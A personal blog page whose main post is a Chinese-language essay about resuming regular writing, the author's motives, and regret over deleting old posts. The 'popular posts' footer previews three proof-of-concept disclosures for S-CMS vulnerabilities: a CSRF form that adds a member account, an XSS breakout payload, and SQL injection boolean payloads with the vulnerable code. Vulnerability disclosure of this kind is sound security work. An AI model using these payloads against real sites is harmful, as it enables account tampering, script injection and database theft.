Skip to main content

再出发

  几年前,大抵是我还在上初中的时候,就保持着每周写一篇文章的习惯.那
时,即使文章所蕴含的思想并不足够深刻,但至少都是经过思考的产物.过去写的文章,全都发在当时常用的qq空间里,现在已经全无踪迹,因为过去的某一个下午,发觉自己发表文章面向的对象宽泛且愚蠢,便于那天将文章全部删除,并发出一条新的"停更十年".后来这条通知性质的说说也未能幸免于难.回头看,不免觉得惋惜,我失去了窥视过去思考成果的机会.
    后来,为什么又再度开始了呢?实际上,多出于世俗的功利考虑,也包含精神宣泄的冲动.在日常生活中,人的行为多为思考结果的体现.而思考的过程并未能显现出来.倘若过着的是纵情于感官享受的生活,倒也无妨,因为并不存在表达精神境界的动机,也因掌握着生活的主动权而免于受支配的烦恼.而我并非此类人.若不将心中所想以某种形式表达出来,世俗社会对于我的定义大致是高中辍学,不学无术,好逸恶劳的asshole.这是需求之一,另一部分是求偶需求,属于比较长远的考虑,今后在另一篇中写出来.
    除此之外,锻炼表达能力也占一部分.写文章这件事总归是需要长久练习的不恰当的表达方式可以使语言与原意大相径庭,在写作时这种感觉尤为明显.

Comments

Popular posts from this blog

The POC of S-CMS(CSRF)-CVE-2018-19332

Download page: https://shanlingtest.oss-cn-shenzhen.aliyuncs.com/file/2.mall.php.zip CSRF Exp: <!DOCTYPE html> <html> <head>     <meta http-equiv="Content-Type" content="text/html" charset="utf-8" /> </head> <body> <center><h1>fake request</center> <div>     <form action="http://127.0.0.1/S-CMS/admin/ajax.php?type=member&action=add&lang=0" name="form" method="post" role="form">     <input type="hidden" name="M_login" value="hacker">     <input type="hidden" name="M_pwd" value="hacker">     <input type="hidden" name="M_money" value="10000">     <input type="hidden" name="M_fen" value="0">     <input type="hidden" name="M_name" value="1">     <inpu...

The POC of S-CMS(Xss) -CVE-2018-19145

Download page: https://shanlingtest.oss-cn-shenzhen.aliyuncs.com/file/2.mall.php.zip location: S-CMS/search.php   line144 Vulnerable code:  <input type="text" name="keyword" class="form-control" placeholder="<?php echo lang("输入关键词/l/Input your Keywords")?>" value="<?php echo $keyword?>"> Exp: "><script>(1)</script>

The POC of S-CMS(sql-injection)-CVE-2018-19331

Download page: https://shanlingtest.oss-cn-shenzhen.aliyuncs.com/file/2.mall.php.zip location: S-CMS/search.php line 155 Vulnerable code:  $sql="select * from SL_text where (T_title like '%". $keyword ."%' or T_content like '%". $keyword ."%' ) order by T_id desc"; Exp: %' AND 1=1 AND '%'=' %' AND 1=2 AND '%'=' Attacker can add sql statement in the between of both "and" to query the database.